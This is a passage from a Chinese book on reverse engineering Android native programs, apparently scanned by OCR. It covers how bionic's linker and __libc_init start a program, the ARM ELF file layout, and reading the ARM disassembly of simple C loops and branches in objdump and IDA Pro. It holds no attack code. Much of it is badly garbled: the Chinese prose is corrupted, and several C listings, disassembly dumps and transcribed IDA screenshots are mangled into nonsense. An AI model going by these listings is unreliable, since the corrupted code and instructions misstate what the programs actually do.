回 原生 程序 的 入 口 到 r0， 最 后 将 r0 赋 值 给 pc 跳 转 到 真正 的 程序 入 口 去 执 
行 。_linker_init 代 码 位 于 Android 系 统 源码 目录 下 的 bionicNinkemlinker.c 
文件 中 ， 它 的 代码 比较 长 ， 我 就 不 列 出 来 了 ， 上 有 具体 的 工作 是 设置 TLS、 
初始 化 环境 函数 、 加 载 可 执行 文件 、 加 载 所 需 的 动态 库 、 解 析 符 号 等 ， 
完整 的 实现 代码 读者 可 以 参看 linker.c 文 件 。_jlinker_init 函 数 执行 完 后 ， 
会 返回 被 执行 程序 的 入 口 地 址 ， 也 就 是 动态 链接 程序 自身 的 _start 函 数 
地 址 ， 最 后 调用 “mov pc, r0” 跳 转 过 去 执行 ， 接 下 来 的 执行 过 程 就 与 静态 
链接 相同 了 。 讲 到 这 里 ， 我 们 来 整理 一 下 思路 : 静态 链接 与 动态 链接 程 
序 的 入 口 函数 相同 ， 动 态 链 接 的 程序 在 执行 入 口 函 数 衣 需要 通过 linker 
进行 额外 的 初始 化 。 

动态 链接 还 包含 一 类 文件 ， 那 就 是 动态 链接 库 。 在 生成 动态 链接 库 
时 会 链接 crtbegin_so.o 与 crtend_so.o 目 标 文 件 ， 并 且 传 入 的 链接 脚本 为 
armelf_linux_eabi.xsc。crtbegin_so.0 的 源码 位 于 Android 4.0 源 码 
bioniclibc\arch-arm\bionic 目 录 下 的 crtbegin_so.S 文 件 中 (Android 4.1 为 
crtbegin_so.c) ， 它 的 代码 只 是 定义 了 一 个 on_ dlclose0 函 数 ， 访 函数 





Pp 
Dn 
De 














只 有 一 行 代 码 “__cxa_finalize(& dso_handle)”。 当 动态 链接 库 被 加 载 或 
芭 载 时 ， 这 个 函数 都 会 被 调 有 用， 换言之， 该 函数 就 是 动态 链接 库 的 入 口 
函数 。_cxa_finalize0 函 数 的 代码 位 于 Android 源 码 的 
bionic\liba\stdlib\atexit.c 文 件 中 ， 该 函数 使 用 call_depth 维 护 了 一 个 引用 计 
数 ， 当 动态 链接 库 被 加 载 持 ， 它 的 值 自 增 一 ， 当 动态 链接 库 被 彼 载 时 ， 
它 的 值 自 减 一 ， 当 引用 计数 为 零 时 ， 函 数 调 用 munmap() 释 放 动 态 链接 库 
占用 的 内 存 页 。 











7.2.2 ”main 函数 完 竟 何 时 航 执 行 


完 竟 main 函 数 是 在 何 时 被 执行 的 呢 ? 我 们 查看 _libc_init 函 数 的 代 
码 来 寻找 答案 。 静 态 链 接 与 动态 链接 的 _jlibc_init 函 数 的 实现 代码 不 
同 ， 静 态 链 接 程序 的 _libc_init 函 数 代码 位 于 Android 源 码 目 录 下 的 
bionicibc\bionicNlibc_init_static.c 文 件 中 ， 代 码 如 下 : 





1 .noreturn void _ libe init(uintptr 七 *elfdata, 

2 void (*onexit) (void), 

3 iiib "(relingehory nt Char™ har 

4 structors_array_t const * const structors) 
SY 入 

6 int argce; 

7 char **argv, **envp; 

8 

9 /* 初始 化 c 运 行 库 环境 */ 

£0 __libc_init_common(elfdata); 

EL 

12 /* Several Linux ABIs don't pass the onexit pointer, and the ones that 
业 当 * do never Use it. Therefore, we ignore it. 

14 a 

15 

16 /* 调用 pre-init 数 组 函数 */ 

b sy call_array (structors->preinit_array); 

18 

19 #ifndef __i386__. 

20 /* .ctors section initializers, for non-arm-eabi ABIs */ 

21 call_array (structors->ctors_array); 

22 #endif 

23 

24 // 调用 静态 构造 器 数组 函数 

了 9 cal1_array(SsStructors->1init_arrav) ; 

26 

2 argc = (int) *elfdata; / /设置 argc 

28 argv = (char**) (elfdata + 1); // 设 置 argv 

29 envp = argv + argc + 1; // 设 置 envp 

30 

站 /* The executable may have its own destructors listed in its .fini array 
3 * so we need to ensure that these are called when the program exits 
这 本 * normally. 

34 二 

35 if (structors->fini array) 

36 _ Cxa atexit(_ libc fini,structors->fini_array,NULL); 

37 

38 exit(slingshot (argc，argv，envp)); // 调 用 main 函 数 并 结束 程序 

88 








} 
静态 链接 的 程序 在 运行 时 “ 杀 力 杀 为 ”， 目 己 初 始 化 C 运 行 库 环境 及 
调用 静态 构造 函数 。 最 后 在 第 38 行 调用 了 slingshot 函 数 ， 也 就 是 程序 的 





main 函 数 ， 最 后 调用 exit0 结 束 程 序 。 动 态 链接 的 程序 则 没有 如 此 麻烦 
了 ， 因 为 程序 运行 前 的 初始 化 工作 已 经 由 linker 完 成 了 ， 动 态 链 接 程 序 
的 _jlibc_init 函 数 代 码 位 于 Android 源 码 目 录 下 的 

bionicibcvbioniclibc_init_dynamic.c 文 件 中 ， 代 码 与 静态 链接 程序 的 

_ jibc_init 函 数 27 行 以 下 部 分 完全 相同 。 











7.3 原生 文件 格式 


ARM 为 其 平台 运行 的 可 执行 文件 制定 了 一 套 规范 ， 所 运行 的 可 执 
行文 件 为 ARM elf 格 式 。 相 关 规 范文 档 “ARM ELF File Format” 的 下 载 地 
址 为 
http://infocenter.arm.com/help/topic/com.arm.doc.dui0101a/DUIO101A_Elf. 
pdf。 在 这 份 文 档 中 ， 没 有 对 elf 格 式 作 过 多 的 要 求 ， 与 传统 Linux 平 台 的 
elf 文 档 格式 十 分 相近 。Android 严 格 遵 守 了 这 份 文档 的 规范 ， 并 扩充 了 
部 分 段 结 构 。 以 下 将 Android 平 台 上 基于 ARM 架 构 的 elf 文 件 称 之 为 
Android elf 文 件 。 

Android elf 文 件 的 结构 是 由 生成 程序 时 的 链接 脚本 控制 的 。 不 同 版 
本 的 NDK 以 及 不 同 版 本 的 链接 脚本 生成 的 elf 文 件 的 结构 都 可 能 有 所 不 
同 。 尊 照 ARM 的 约定 ，elf 文 件 整 体 结构 如 图 7-3 所 示 。 








ELF Header 


Program Header Table 


Section 1 


Section 2 


Section Header Table 








图 7-3 ”Android elf 文 件 


Android NDK 中 的 toolchains\arm-linux-androideabi- 
4.4.3\prebuilt\windows\arm- 
linuxandroideabi\ib\ldscripts\armelf_linux_eabi.x 是 静态 或 动态 链接 时 默 
认 链 接 的 脚本 ， 该 文件 SECTIONS 小 节 中 的 每 一 项 都 是 一 个 Section 〈 节 
区 ) ， 这 些 Section 在 程序 运行 时 有 些 可 以 加 载 到 内 存 中 成 为 
Segment《〈 段 ) ， 有 些 则 不 能 加 载 到 内 存 中 ， 这 是 通过 Section 的 属性 来 
控制 的 。Android elf 文 件 的 开头 是 ELF Header， 它 是 elf 的 文件 头 ， 结 构 
为 Elf32_Ehdr， 与 传统 elf 的 Elf32_Ehdr 结 构 相 同 。 接 着 是 连续 存放 的 
Program Header， 结 构 为 Elf32_Phdr， 同 样 与 传统 elf 的 Elf32_Phdr 结 构 相 
同 。 接 下 来 是 不 同 的 Section， 它 们 在 文件 中 的 顺序 与 SECTIONS 中 定义 
的 顺序 相同 。 而 Section Header 的 结构 为 Elf32_Shdr， 与 传统 elf 文 件 的 
Elf32_Shdr 结 构 相 同 。 在 Android NDK 的 platforms\android-14\arch- 
arm\usr\include\sys\exec_elf.h 文 件 中 ， 定 义 了 所 有 Android elf 文 件 格 式 涉 
及 到 的 结构 与 常量 ， 读 者 可 以 参照 armelf_linux_eabi.x 的 Section 名 与 
exec_elf.h 的 结构 进行 对 比 学 习 。 为 了 辅助 读者 理解 Android ”elf 文 件 格 
式 ， 笔 者 画 了 一 张 动态 链接 的 Android elf 文 件 的 格式 图 ， 具 体 请 参看 随 
书 的 附 图 3。 

本 书 不 打算 详细 介绍 传统 elf 文 件 的 格式 ， 这 些 内 容 在 很 多 书籍 或 文 
章 中 都 有 介绍 ， 没 有 掌握 的 读者 可 以 在 搜索 引擎 中 搜索 “elf 文 件 格式 ”来 
进行 学 习 。 



































7.4 原生 C 程 序 逆 癌 分 析 


本 节 主 要 针对 C 语 言 编 写 的 Android 原 生 程序 进行 逆向 分 析 ， 通 过 阅 
读 不 同 结 构 的 C 程 序 的 反 汇 编 代 码 ， 快 速 掌握 原生 C 程 序 的 逆向 分 析 方 
Us 


7.4.1 原生 程序 的 分 析 方 法 


原生 程序 的 逆 同 分 析 主 要 是 通过 阅读 反 汇编 代码 来 理解 程序 流程 及 
功能 ， 因 此 ， 需 要 有 强大 的 反 汇 编 工具 来 辅助 我 们 完成 分 析 工 作 ， 下 面 
介绍 两 个 反 汇 编 原 生 程 序 的 工具 。 

1. objdump 

在 Android NDK 的 工具 链 中 ， 有 一 个 arm-linux-androideabi-objdump 
工具 ， ee 它 来 反 汇 编 原生 程序 ， 拿 7.1 节 中 的 hello 程 序 做 实例 ， 执 
J 命令 “arm-linux-androideabi-objdump-S hello”* 可 输出 如 下 结 











让 


丁 


hello: file format elf32-littlearm 
Disassembly of section .plt: 
00008288 <.plt>: 
8288: es52de004 push {lr} » "tr Tr Lepr HW=41) 
828c: eS59fe004 ldr Jr, [be #4] ; 8298 <main-0x28> 
8290: e08fe00e 5 
8294: es5bef008 IgE BG LL 8 
8298: 0000817c .Word 0x0000817c 
Disassembly of section .text: 
000082c0 <main>: 
82c0:  e92d4800 push ED 
82c4: e28db004 add fp; SD; #4 
82c8: e24dd008 sub sp, sp, #8 
82cc: e50b0008 Str r0; [Ep; $=8] 
82d0: e50b100c St 开关 42 
82d4: e59f3018 la 区 37 [BC #24] ; 82f4 <main+0x34> 
82Q8 : e08f3003 re 
82dc: ela00003 mo TU x3 
82e0: ebffffed bl 829c <main-0x24> 
82e4d: e3a03000 mov r3, #0 
82e8: ela00003 mov r0, r3 
82ec : e24bd004 sub sp, fp, #4 
82f0 : e8bd8800 pop. {EB Bas 
82f£4: 00000050 .word 0x00000050 
00008300 <_start>: 
8300: ela0000d mov r0, sp 
8304: e3a01000 mov rl1l, #0 
8308:  e28f£f2004 add TI27 Be 淹 4 
830c: e28f3004 add T2323, DE. 4 
8310: eaffffe4 b 82a8 <main-0x18> 
8314: eaffffe9 b 82c0 <main> 


程序 输出 了 “.plt* 与 “.text” 段 的 内 容 ，“.plt* 段 主要 用 于 函数 重 定位 用 
的 ，“.text” 段 为 我 们 程序 的 代码 段 ， 里 面 有 main 与 _start 两 个 函数 。 这 个 
_start 函 数 就 是 前 面 分 析 的 crtbegin_dynamic.S 文 件 中 的 _start 函 数 ， 有 具体 





的 代码 在 这 里 就 不 讲解 了 ， 还 没有 和 掌握 的 读者 请 参看 前 面 7.2 节 的 分 
析 。 

2. IDA Pro 

IDA Pro 是 目前 市 场 上 最 强大 的 反 汇 编 分 析 工 具 ， 文 持 多 系统 、 多 

平台 架构 的 程序 分 析 ， 和 截止 到 目前 为 止 ，IDA Pro 最 新 版 本 为 6.3。 安 装 
好 IDA Pro 程 序 后 启动 它 ， 将 要 分 析 的 程序 拖 入 IDA Pro 的 主 窗口 ， 会 弹 
出 如 图 7-4 所 示 的 对 话 框 。 








Load a nevw file 


Load file D:\workspace\chapter7T\T. 1\hellol\hello as 
[ELF for ARMN (Executable) [elf.ldw] | 


Processor type 





Intel BOxBB processors: metapc v 





Analysis 
Enabled 
Indicator enabled 








Options 
Create base for debugeing 
国 Load resources 
Rename DLL entries 
[| Wanual load 
Fill seaement gaps 
闻 Loadine options 


Create FLAT eroup 





DLL directory IC: “WINDOWS 











图 7-4 IDA Pro 加 载 原生 程序 进行 分 析 





二 
注 尽 








本 章 讲解 原生 程序 的 逆向 分 析 时 使 用 的 IDA Pro 是 其 官方 网 站 上 提供 的 6.2 demo 版 ， 读 者 可 
以 从 以 下 网 址 下 载 试用 。 





Linux 版 的 下 载 地 址 为 : http://out5.hex-rays.com/files/idademo_linux62.tgz 


Windows 版 的 下 载 地 址 为 : http://out5.hex-rays.com/files/idademo_windows62.exe 





点 击 OK 按钮 IDA Pro 就 会 加 载 并 分 析 程 序 ， 分 析 完 毕 后 的 界面 如 图 
7-5 所 示 。 








图 7-5 IDA Pro 分 析 结 果 


可 以 看 到 ，IDA Pro 强 大 的 分 析 功 能 已 经 解析 出 了 j_main 跳 转 及 真正 
的 main 疯 数 。 这 时 按 下 空格 键 会 切换 到 图 形 视 图 ， 再 次 按 下 空格 键 会 切 
换 到 反 汇 编 视图 ， 以 后 按 下 空格 键 束 会 在 图 形 视图 与 反 汇 编 视图 之 间 切 
换 ， 如 果 想 回 到 刚才 的 接近 浏览 器 (Proximity Browser) 视图 ， 点 击 菜 
单 “ViewOpen ” subviews -Proximity Browser 即 可 ， 也 可 以 按 下 
CTRL+1 快 捷 键 ， 然 后 双击 Proximity Browser 项 。 

用 鼠标 点 击 main 函 数 ， 按 下 空格 键 ， 碍 看 main 函 数 的 代码 ， 如 图 7- 
6 所 示 ，IDA Pro 直 接 在 “ADD R3, PC, R3” 代 码 行 给 出 了 字符 串 的 注释 ， 
这 真是 非常 人 性 化 的 功能 





; Segment type: Pure code 
AREA .text, CODE, ALIGN=4 
; ORG Ox82C8 

0DE32 


; httributes: bp-based frame 


main 


-BxC 
-8 


SP?, R11,LR> 

R11,。 SP ， 井 44 
SP , #8 
[R11,#var 8] 
[R11,#var C] 
=(aHellonhrm - 6x82E8) 
PC，R3 ; "Hello RH” 
R3 9 入 


SP {RI1.PG 
: End of function main 





图 7-6 ”使 用 IDA Pro 分 析 main 函 数 
7.4.2 for 循环 语句 反 汇 编 代 码 的 特点 


顺序 语句 、 循 环 语句 、 分 文 语 句 是 程序 代码 的 主要 语句 结构 , 赣 癌 
分 析 程 序 的 过 程 中 大 多 是 在 和 这 些 语句 在 打交道 ， 因 此 了 解 这 些 代 码 所 
生成 的 ARM 指 令 特征 ， 对 逆 回 分 析 工 作 是 大 有 帮助 的 。 

本 节 先 从 for 循 环 语句 开始 ， 实 例 代 码 如 下 : 











#include <stdio.h> 
.ms Ll SS EL i 
it EGE (EE 站 试 // 普 通 Eoz 循 环 
Ln A Se Os 
a 和 二 
£0 {1 SS QF TS 7 注 下 让 
让 三 证 六 这 
} 
return s; 
} 
int For2 (int njt / /访问 全 局 数组 
和 
int s = 0; 
fF 和 卫生 这 
S: 二 三 二 六 和 4-numsln=11]:y 
} 
return s; 
} 
nt maint(tint argde, nt argv[il] 1}1 
EINEE ("FoRL SN, fol (SY) 
Brame (viorZe Sdn £0r2(D Ys 


EE 














} 
forl 为 普通 的 for 循 环 ，for2 循 环 中 访问 了 全 局 数组 。 将 程序 编译 并 
生成 可 执行 程序 。 
注意 
在 以 后 的 代码 讲解 中 ， 限 于 篇 幅 原因 不 再 讲述 如 何 编译 生成 原生 程序 ， 如 果 有 读者 还 未 党 


这 部 分 内 容 ， 请 重新 阅读 并 参考 7.1.2 小 节 完 成 编译 工作 。 





将 编译 生成 的 程序 拖 入 IDA Pro 主 程序 中 ， 在 main 函 数 处 按 下 空格 
键 ， 碍 看 反 汇 编 代 码 ，main 函 数 代 码 如 下 : 


人 


WO OW DD 人 人 OOD ODODDODPPPc PPPpPppp pr 
RE 3 A nm ss BY 2 em DD 


EXPORT 


main 


var_ C= 


var_8= 


STMFD 
ADD 
SUB 
STR 
STR 
MOV 
BL 
MOV 
LDR 
ADD 
MOV 
MOV 
BL 
MOV 
BL 
MOV 
LDR 
ADD 
MOV 
MOV 
BL 
MOV 
MOV 
SUB 
LDMFD 


@ 设 置 R11 的 值 ， 作 为 栈 帧 指针 使 用 


main 

-0xC 

-8 

SP!, {R11,LR)} @ 保 存 现 场 
R11; SP .#4 

SP, SP, #8 @ 开 有 辟 栈 空间 
RO, [R11,#var_8] @ 保 存 参数 1 
R1, [R11,#var_c] @ 保 存 参数 2 
RO, #5 GR0=5 
forl @ 调 用 for1 
R22 :RO 

R3, =(aForlD - 0x8414) 

RS PC5 BS ON 
RO RK3 ; format 

Ri Re2 

printf @ 调 用 printf 
RO, #5 GR0=5 
for2 @ 调 用 for2 
BR2.. :RO 

R3, =(aFor2D - 0x8434) 

RS RE. RI 5 
RO Rd ; format 

RR 全 

printf @ 调 用 printf 
R3, #0 

表 忆 :让 过 

SE 

spls RIE,Eei 


; End of function main 


main 函 数 在 第 13 行 调用 了 for1 函 数 ， 双 击 forl 函 数 ， 进 入 函数 代码 


体 。 按 下 空格 键 切换 到 图 形 视图 ， 如 图 7-7 所 示 ， 图 中 有 三 种 颜色 的 箭 
头 : 赣 色 箭头 表示 顺序 执行 ， 绿 色 箭 头 表示 条 件 满足 时 执行 ， 红 色 箭 ; 
表示 条 件 不 满足 时 执行 






















; Attributes: bp-based frame 


EXPORT for1 
for1i 












var 2 -Ox24 
var 20= -0x20 
var_1C= -OXx1C 
var 18= -8x108 
var C= -BxC 

var B” -8 
var = 8 


R11, [SP ,WW-h*+uvar OO] 
ADD R11, SP, #8 
SUB SP, SP, #208 
STR RO, [R11,#8x14rvar 24] 
MOU R3, #8 
STR R3, [R11,W8x1h*+var 28] 
MOU R3, #0 
STR R3, [R11,#0x14*var 1C] 
HOU R3, #0 

[R11 ,We0x14*var 29] 
_832C 

















loc_8325 
LDR R2, [R11,var_C] 
LDR R3，[R11,#uar 19] 
R2，R3 

loc 838C 


R3, [R11,Wuar 8] 
R98, R3 

[R11, var_C] SP, R11 

R3 ,LSLNT SP?，《R11》 


[R11,Wvar 8] LR | 

R2，R3 ; End of function for1 
[R11 ,Wuar 8] 

[R11 ,Wuar 5C] 

R3,， 其 1 

[R11,#var C] 





图 7-7 使 用 IDA Pro 分 析 for1 函 数 
整个 流程 图 结构 清晰 ，for 循 环 的 初始 化 部 分 在 loc_832c 块 的 上 面 ， 





刚 进入 函数 时 ， 程 序 保护 了 现场 ， 开 辟 了 栈 空间 ， 并 初始 化 了 变量 j 与 
s，loc_ 832c 这 一 块 是 for 循 环 的 条 件 判 断 部 分 。loc_830c 这 一 块 为 for 循 环 
的 执行 体 了 , “mov R3,R3, LSL#1” 这 行 代 码 就 实现 了 i* 2， 接 下 来 “ADD 
R3,R2,R3” 就 完成 了 s += i *2， 接 着 是 “ADD R3, R3 #1” 让 R3 自 增 1， 最 
后 “STR R3,， [R11, #vVar_CJ]” 保 存 中 间 结 果 ， 完 成 这 一 步 后 跳 转 到 循环 条 
件 判断 部 分 ， 如 果 条 件 满足 就 继续 执行 循环 体 ， 不 满足 就 执行 红色 箭头 
指 问 的 代码 块 。 

下 面 看 看 for2 函 数 ，for2 函 数 的 流程 图 如 图 7-8 所 示 。 


= Bttributes: bp-based Frane 


ERPOURT Forz 
[| 


var _ 2 一 
Gar ZO= ~lx2t 
Gar_1C= =e1e 
r= -1 
var b= 一 和 KE 

里 引 P_ 肌 二 一 全 
yarP_ B= 0 


R11 [SP ,suar + 
生计 。 人 SFP。 挤 明 

SP ， SP 。 蕴 w1 轴 

R3, -=_GLOBAL OFFSET ThBLE ; PIC made 


也 各 ， 械 展 省 省 ， 搜 脱光 二 生 才 中" 芝 语 ] 
E22 。 料 外 

RR2 。 工 民 二 十 ， 捕 是 江 二老 去 忆 配方 巴 ] 
用 2 。 林 也 
LP 
RR2 ， 科目 

R22 ， 上 [ 展 二 和， 挤 各 并 雯 + 和 _ 愉 利 ] 
loc 3tw 


loc B93C8 

LBR R1, [R11,tmvar 5] 
R2, [R11,tuar 10] 
1 。 生生 
loc B39 


Ra: [R11:wwar gS] 
ROW, Ba 

[R11 ,uar CC] SP, R11 

[R11 .Buar EC] SP 全 Ril 

RB, 用 2 LR 

[R11 ,Svar ‘18] ; End of Fanction Fory 

民 吕 ，。 其 1 

-tnuns ptr - Bxidsssy) 

[R3.R2] ; Mums 

[R2 ,RELSLH2] 

Bi Kz 

[R11 ,uar g] 

月 站。 fz 

[R11, var 9] 

[R11, Buar CC] 

目 2 。 项 1 

[R11 ,uar _C] 





图 7-8 ”使 用 IDA Pro 分 析 for2 函 数 


for2 函 数 增加 了 对 全 局 变量 的 访问 。 在 刚 进入 函数 时 ， 有 这 样 一 条 
指令 : 
LDR R3, =_GLOBAL OFFSET _ TABLE _; PIC mode 


GLOBAL_OFFSET_TABLE 名 为 全 局 偏 移 表 ， 称 为 GOT， 注 释 中 的 
PIC 表示 这 是 位 置 无 关 代 码 (Position Independent Code) 。gcc 编 译 程序 
时 期 变量 的 装载 地 址 不 能 确定 ，ARM 采 用 了 GOT 来 解决 这 个 问题 。 在 
ARM 程 序 编译 期 间 ， 编 译 器 将 程序 中 所 有 全 局 变量 的 labal 地 址 存放 到 
一 个 “.got* 段 中 ， 代 码 中 对 变量 的 访问 被 设计 成 采用 索引 方式 对 GOT 的 
元 素 访 问 。 程 序 在 运行 时 ，linker 会 读 取 变量 的 实际 地 址 并 填充 GOT 中 
的 各 项 元 素 ， 这 样 在 访问 变量 时 就 不 会 出 现 变 量 地 址 错误 等 问题 。 实 例 
for2 程 序 中 通过 以 下 两 行 代码 就 获取 了 nums 数 组 的 地 址 : 

LDR R2, =(nums._ptr - 0x10598) 

LDR R22. [RSPRe) » Mams 

第 1 行 代码 是 获取 nums 数 组 在 GOT 中 的 索引 ， 不 管 程序 装载 地 址 如 
何 变化 ， 这 个 值 是 不 会 变 的 ， 第 2 行 代码 ，R3 为 GOT 的 首 地 址 ， 以 R3 为 
基 址 ， 寻 找 R2 项 中 所 保存 的 地 址 值 ， 并 将 结果 传送 到 R2 寄 存 器 中 ， 一 
次 变量 地 址 的 重 定位 操作 就 巧妙 地 完成 了 。 

for2 函 数 的 for 循 环 执行 体 通过 以 下 三 行 代码 ， 实 现 了 i* i。 























LDR R22 [RIL. $Vvar CC] 

LDR Ros [PRIN 二 weie El 

MUL RE -Uy 2 

由 于 代码 没 经 过 优化 ， 设 置 R2 与 RO 的 值 时 对 同一 块 内 存 访问 了 两 
次 ， 显 得 比较 笨拙 。 

LDR Ras TED Lot 

ADD 民 人 到 

LDR Rl LRLL.#Var 8 


ADD RZ， 及 土 下 号 





这 4 行 代码 实现 了 s+= i*i + nums[n-1]。 第 1 行 代码 R2=R2 + R0 *4， 
代码 采用 左 移 4 位 实现 数组 元 素 的 获取 ， 第 2 行 代码 完成 了 i* i + nums[n- 
1]， 第 3 行 与 第 4 行 完 成 了 最 后 s 的 赋值 操作 。 

到 这 里 ，for 循 环 的 分 析 就 告 一 段落 了 。 总 结 一 下 for 循 环 代码 的 分 
析 过 程 : for 循 环 是 程序 中 经 常 使 用 到 的 一 种 程序 结构 ， 它 的 代码 执行 路 
径 如 IDA Pro 分析 中 所 见 ， 呈 一 种 回路 结构 ， 回 路 结构 的 进入 点 是 for 循 
环 的 条 件 判 断 部 分 ， 回 路 中 绿色 箭头 指向 的 部 分 为 for 循 环 的 执行 体 ， 回 
路 中 红 箭 头 指 回 的 部 分 为 循环 的 结束 点 。 


7.4.3 ”证 ..else 分 文 语句 反 汇 编 代 码 的 特点 


if..else 判 断 分 支 在 程序 中 使 用 最 为 频 和 过， 下 面 看 看 它 的 结构 有 什么 
特点 。 首 先 编写 一 段 包含 计 ..else 分 支 语句 的 程序 。 代 码 如 下 : 








#include <stdio.h> 
void ifl(int n)t 


天 
printf("the number less than 10\n"); 


//if else 语 句 


} else { 
printf("the number greater than or equal to 10\n"); 


} 
void if2(int n)t / /多重 if else 语 名 


fi(mn 6) 
printf ("he LS: a boy\n’"): 


$B ee 
printf("he is a young man\n"); 


} else if(n < 45){ 
printf("he is a strong man\n"); 


} elset 
printf("he is an old man\n"); 


} 


int main(int argc, 
TEL (DY: 
2 
return 0; 
小 
程序 有 两 个 函数 if1 与 f2， 一 个 含 基 本 的 if...else 语 句 ， 一 个 舍 多 重 
if...else 语 句 。 编 译 生 成 可 执行 程序 。 并 将 可 执行 程序 拖 入 IDA ”Pro 中 进 


行 分 析 ， 放 函数 流程 图 如 7-9 所 示 。 


int** argv{[])t 











7 Segnent type: Pure code 
AREA -text, CODE, ALIGN=4 
; ORG @x82C0 

CODE32 


; Attributes: bp-based frane 


Sp, {R11,LR》 
R11，SP ， 持 尺 

SP, SP, #8 

RG, [R11,#var 8] 
R3, [R11,#var 8] 
R3, #9 

loc 82F8 





R3，=(aTheNunberLessT - Gx82E8) 

R3，PC，R3 ; "the munber less than 10" EE 

RB，R3 是， » =(aTheNunberGreat - Gx82FC) 
Puts ，PC，R3 ; “the munber greater than or equal to 108" 
loc 83868 » R3 3 要 







SP ， 《R11， PC 


; End of function if1 





图 7-9 ”使 用 IDA Pro 分 析 if1 函 数 


整个 函数 被 分 成 了 两 个 执行 路 人 笃 ， 最 后 函数 使 用 了 同一 个 出 口 。 看 
初始 化 部 分 代码 : 





STR RO, [R11,#var_8] 
LDR R33] 
CMP R33 江 昌 

BGT loc_82F0 


前 两 行 代 码 将 R0 的 值 赋值 给 R3， 即 R3 = n， 第 3 行 拿 R3 与 9 比较 ， 
第 4 行 如 果 R3 大 于 9， 就 跳 到 loc_82F0 处 去 执行 ， 如 果 条 件 不 成 立 ， 就 执 
行 剩 下 的 另 一 个 分 文 。 


LDR R3，=(aTheNumberGreat - 0x82FC ) 

ADD RS PG, 及 3 ; "the number greater than or equal to 10" 
MOV RO, R3 7 S 

BL puts 








loc_82F0 分 支 块 有 4 行 代 码 ， 前 两 行 通过 重 定 位 取出 字符 串 的 地 址 


到 R3， 第 3 行 给 输出 函数 的 参数 赋值 ， 第 4 行 调用 puts 输 出 结果 。 力 一 个 
分 文 的 代码 类 似 ， 最 后 函数 出 口 恢 复 了 SP 寄存 器 并 返回 。 
再 来 看 看 i 这 函数 的 代码 。 流 程 如 图 7-10 所 示 。 








De ER 

LDR R3, ~(alelsABoy ~ gx8338) LDR R3。-(aHeIshYoungMan ~ Ox9359) LDR R3, ~(alelsAStrongMan ~ 0x8379) 
ADD R3, PE, RA ; “he is a boy" 因 [nop R32, PE, R3 ; “he fs a young nan Ra, PE, Ra ; "he 1 trong nan 
HOU ,Ra ; HOU R98, Ra ; RQ, A ; 

BL 

B 


DI 
ADD 1 3989 
HOU LDR R3, ~(alelsanGldMan ~ (x838C) 
puts BL puts BL puts R3, PC, R3 he fs an 01d man 
loc_8390 B loc 8390 B loc_8390 RO, RS ; 





SUB SP, R11, Wy 
LDMFD Spr, {R11,PCY 
; End of function if 


图 7-10 ”使 用 IDA Pro 分 析 if2 函 数 


for2 是 一 个 多 重 的 让 .else 函 数 。 整 个 函数 的 分 文 结构 呈 树 状 ， 所 有 
的 分 支 都 共用 一 个 函数 出 口 。 函 数 的 每 个 计 分 文 语 句 都 采用 红色 箭头 指 
问 ， 每 个 else.… 让 语句 采用 绿色 箭头 指向 ， 所 有 条 件 执行 完 后 都 由 一 个 赣 
色 箭 头 指向 函数 的 出 口 。 各 个 分 文体 的 内 容 与 forl 函 数 类 似 ， 这 里 就 不 
再 资 述 了 ， 读 者 可 以 目 己 锻炼 分 析 。 


7.4.4 ”while 循 环 语句 反 汇 编 代 人 码 的 特 扣 


while 循 环 有 do...while 与 while...do 两 种 表现 形式 ， 其 执行 效果 与 for 
循环 类 似 。 下 面 是 测试 代码 : 


#include <stdio.h> 
int dowhile(int n){ // 先 执行 后 判断 
下拉 全 证 过 
Tt a = Ds 
dol{ 
各 站 三 主 ， 
}while(i++ < n); 
return s; 
} 
int whiledo(int n){// 先 判断 后 执行 
nt TL = Ls 
me SS 0 
while(i <= n)t 
S 二 = 工 ++:; 
return s; 
int main{int arge, int** argv[])t 
printf("dowhile:%d\n", dowhile(100)).; 
printf("while:%d\n", whiledo(100)); 
return 0; 
} 
测试 程序 的 dowhile 函 数 与 whiledo 函 数 都 执行 一 样 的 功能 : 求 整数 
的 累加 和 。dowhile 先 执行 一 次 素 加 操作 ， 然 后 进行 判断 ， 如 果 条 件 成 
六， 就 执行 循环 体 ，whiledo 则 先 判 断 条 件 是 否 成 并 ， 条 件 成 立 才 执行 
循环 体 。 编 译 程序 并 将 可 执行 文件 皂 入 IDA Pro 中 ，dowhile 的 执行 流程 
如 图 7-11 所 示 。 


EXPDRT dowhile 
dowhile 


yar_24= -0x24 
var_28= -0x28 
uar 1C= -x1C 
uar 18= 一 Be1 
var_C= 一 BYXC 
uar_ 8= -8 

var B= BE 


R11, [SP ,tu+uar BJ? 
R11，SP ， 失 归 

SP ,SP 井 Bis 1 入 

RO, [R11, 村 x14+uar 24] 
R3 ， 苦 1 

R3，[R1T , 振 和 war 28] 
R3 ， 振 有 

R3;, [R11 村 x14+vuar 1C] 


[R11,#uar 8] 


[R11.,#var_C] 
R2, R3 

[R11 ,uar 8] 
[R11,#uar_cC] 
[R11, 相 var 16] 
R3 


持 自 

本 1 

R3, WxFF 
[R11, uar_C] 
R2 ， 间 1 
[R11,#uar_C] 
半日 

82E8 


R3, [R11,#uar 8] 
RB，R3 

SP，R11 

SP ，《R11》 

LR 


: End of function dowhile 




















图 7-11 使 用 IDA Pro 分 析 dowhile 函 数 


do.….while 分 文 语 句 的 条 件 判 断 与 执行 体 部 分 合成 了 一 个 整体 ， 如 果 
条 件 满 足 就 路 回 到 执行 体 头 部 重复 执行 ， 条 件 不 满足 就 执行 红色 箭头 指 
向 的 部 分 ， 即 从 函数 出 口 返回 。 函 数 的 初始 化 代码 如 下 : 








STR R11, [SP, #-4+var_0]! 
ADD 有 Ra 总 下 7 和 混 抽 

SUB SP, SP, #0x14 

STR RO, [R11,#0xl4+var_24] 
MOV R3，#1 

STR R3, [R11,#0xl14+var_20] 
MOV 了 过 

STE R3, [R11,#0xl14+var -lc] 


第 1 行 代码 将 R11 寄存 器 压 入 堆栈 。 第 2 行 设 置 R11 寄存 器 的 值 ， 作 
为 栈 帧 指针 作用 。 第 3 行 开 辟 栈 空间 ， 用 来 存 入 临时 变量 。 第 4 行 保存 第 
一 个 参数 n 的 值 。 第 5-6 行 初始 化 并 保存 了 变量 i 的 值 。 第 7-8 行 初始 化 并 
保存 了 变量 s 的 值 。 

注意 看 上 面 这 段 代 码 ， 第 4 行 寄存 占 R11 后 面 的 偏 移 量 是 

#0x14+vVar_24， 也 就 是 var_24 加 上 了 第 3 行 偏 移 差 值 ，var_24 在 函数 头 部 
分 被 指出 值 为 -0x24， 而 开辟 栈 空间 时 却 没 有 这 么 大 ， 为 什么 呢 ? 其 
